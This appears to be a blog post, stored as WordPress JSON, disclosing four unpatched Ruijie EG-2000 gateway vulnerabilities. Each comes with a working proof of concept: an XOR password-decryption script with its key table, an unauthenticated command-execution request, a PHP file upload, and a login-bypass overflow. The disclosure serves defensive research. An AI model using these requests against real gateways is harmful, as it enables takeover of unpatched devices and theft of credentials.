{"id":239,"date":"2024-07-16T12:44:50","date_gmt":"2024-07-16T04:44:50","guid":{"rendered":"https:\/\/0x.mk\/?p=239"},"modified":"2024-07-16T12:44:50","modified_gmt":"2024-07-16T04:44:50","slug":"ruijie-eg-2000-series-multiple-vulnerabilities","status":"publish","type":"post","link":"https:\/\/0x.mk\/?p=239","title":{"rendered":"Ruijie EG-2000 series multiple vulnerabilities"},"content":{"rendered":"\n

We found multiple vulnerabilities based on EG-2000SE Next Gen Gateway. <\/p>\n\n\n\n

CVE-2019-16638: User password is stored with symmetric encryption<\/strong><\/h2>\n\n\n\n

CWE-257: Storing Passwords in a Recoverable Format<\/p>\n\n\n\n

An issue was found on the Ruijie EG-2000 series gateway. An attacker can easily dump cleartext stored passwords in \/data\/config.text<\/code> with simple XORs. This was tested on EG-2000SE EG_RGOS 11.1(1)B1.<\/p>\n\n\n\n

PoC:<\/p>\n\n\n\n

import binascii\nKEYTBL = b\"*@##Wxf^cOurGer*mArKLe%aIRwolf&^StarRdH#&)####^*$%!!#&)%071177\"\npwd_enc = \"1044407451471c\"\npwd = binascii.unhexlify(pwd_enc[2:])\noffset = int(pwd_enc[:2])\nresult = bytearray()\nfor i in range(len(pwd)):\n    result.append(pwd[i] ^ KEYTBL[i + offset])\nprint(result)<\/code><\/pre>\n\n\n\n
CVE-2019-16639: Arbitrary command execution on newcli.php<\/strong><\/h2>\n\n\n\n
CWE-78: Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)<\/p>\n\n\n\n
An issue was found on the Ruijie EG-2000 series gateway. There is a newcli.php API interface without access control, which can allow an attacker (who only has web interface access) to use TELNET commands and\/or show admin passwords via the mode_url=exec&command= substring.
This affects EG-2000SE EG_RGOS 11.9 B11P1.<\/p>\n\n\n\n
PoC:<\/p>\n\n\n\n
POST \/newcli.php HTTP\/1.1\nCookies: [REDACTED]\nContent-Type: application\/x-www-form-urlencoded\n\nmode_url=exec&command=show%20webmaster%20users<\/code><\/pre>\n\n\n\n
CVE-2019-16640: PHP file upload via upload.php<\/strong><\/h2>\n\n\n\n
CWE-434: Unrestricted Upload of File with Dangerous Type<\/p>\n\n\n\n
An issue was found in upload.php on the Ruijie EG-2000 series gateway. A parameter passed to the class UploadFile is mishandled (%00 and \/var\/.\/html are not checked), which can allow an attacker to upload any file to the gateway.
This affects EG-2000SE EG_RGOS 11.9 B11P1.<\/p>\n\n\n\n
PoC:<\/p>\n\n\n\n
POST upload.php?c=upload&a=index&fileext=txt&filedir=%2Fvar%2Fhtml&obj=1&_ruijie_upload%5B%5D=1\nCookies: [REDACTED]\nContent-Type: multipart\/form-data; boundary=---------------------------9051914041544843365972754266\nContent-Length: 554\n\n-----------------------------9051914041544843365972754266\nContent-Disposition: form-data; name=\"file\"; filename=\"\/var\/.\/html\/poc.php\"\n\n<?php phpinfo();\n-----------------------------9051914041544843365972754266--<\/code><\/pre>\n\n\n\n
CVE-2019-16641: Buffer overflow on login.php<\/strong><\/h2>\n\n\n\n
CWE-121: Stack-based Buffer Overflow<\/p>\n\n\n\n
An issue was found on the Ruijie EG-2000 series gateway. There is a buffer overflow in client.so. Consequently, an attacker can use login.php to login to any account, without providing its password.
This affects EG-2000SE EG_RGOS 11.1(1)B1.<\/p>\n\n\n\n
PoC:<\/p>\n\n\n\n
POST \/login.php HTTP\/1.1\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 124\n\nusername=admin&password=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
For all of the vulnerabilities I found, I have submitted bug report to Ruijie on 10\/14\/2019, but I didn’t get any response from them. The official patch of these vulnerabilities is not available. <\/p>\n","protected":false},"excerpt":{"rendered":"
We found multiple vulnerabilities based on EG-2000 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-239","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/0x.mk\/index.php?rest_route=\/wp\/v2\/posts\/239","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/0x.mk\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/0x.mk\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/0x.mk\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/0x.mk\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=239"}],"version-history":[{"count":2,"href":"https:\/\/0x.mk\/index.php?rest_route=\/wp\/v2\/posts\/239\/revisions"}],"predecessor-version":[{"id":241,"href":"https:\/\/0x.mk\/index.php?rest_route=\/wp\/v2\/posts\/239\/revisions\/241"}],"wp:attachment":[{"href":"https:\/\/0x.mk\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=239"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/0x.mk\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=239"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/0x.mk\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=239"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}